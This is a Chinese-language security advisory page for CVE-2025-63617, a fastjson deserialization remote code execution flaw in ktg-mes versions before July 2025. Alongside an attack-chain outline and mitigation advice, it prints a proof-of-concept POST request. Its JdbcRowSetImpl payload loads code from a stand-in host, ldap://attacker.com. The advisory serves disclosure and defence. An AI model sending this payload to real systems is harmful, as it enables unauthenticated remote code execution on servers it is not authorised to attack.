CVE-2025-63617 CVSS 6.5 中危

CVE-2025-63617: ktg-mes fastjson反序列化远程代码执行漏洞

披露日期: 2025-11-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63617

漏洞类型

反序列化漏洞

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ktg-mes

漏洞概述

ktg-mes系统在2025年7月3日之前的版本存在严重的fastjson反序列化漏洞，攻击者可通过构造恶意JSON数据在目标服务器上执行任意代码。该漏洞源于使用了存在安全缺陷的fastjson库版本，并直接对用户输入进行反序列化处理，无需任何认证即可利用此漏洞。

技术细节

fastjson反序列化漏洞允许通过特制的JSON payload绕过安全限制，触发任意类实例化并执行危险操作。攻击者可以利用@type字段指定任意类，结合autoType功能实现远程代码执行。

攻击链分析

STEP 1

攻击者识别出目标系统使用ktg-mes且版本低于a484f96提交

STEP 2

构造包含恶意autoType的fastjson payload

STEP 3

发送POST请求到/api端点，包含序列化后的Java对象

STEP 4

fastjson库反序列化时触发恶意类加载和代码执行

STEP 5

实现远程代码执行，执行系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /api HTTP/1.1
Host: target.com
Content-Type: application/json

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}

影响范围

ktg-mes < a484f96 (2025-07-03)

防御指南

临时缓解措施

立即升级ktg-mes到最新版本；如无法立即升级，可通过配置禁用fastjson的autoType功能并添加WAF规则阻止可疑的@type参数

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表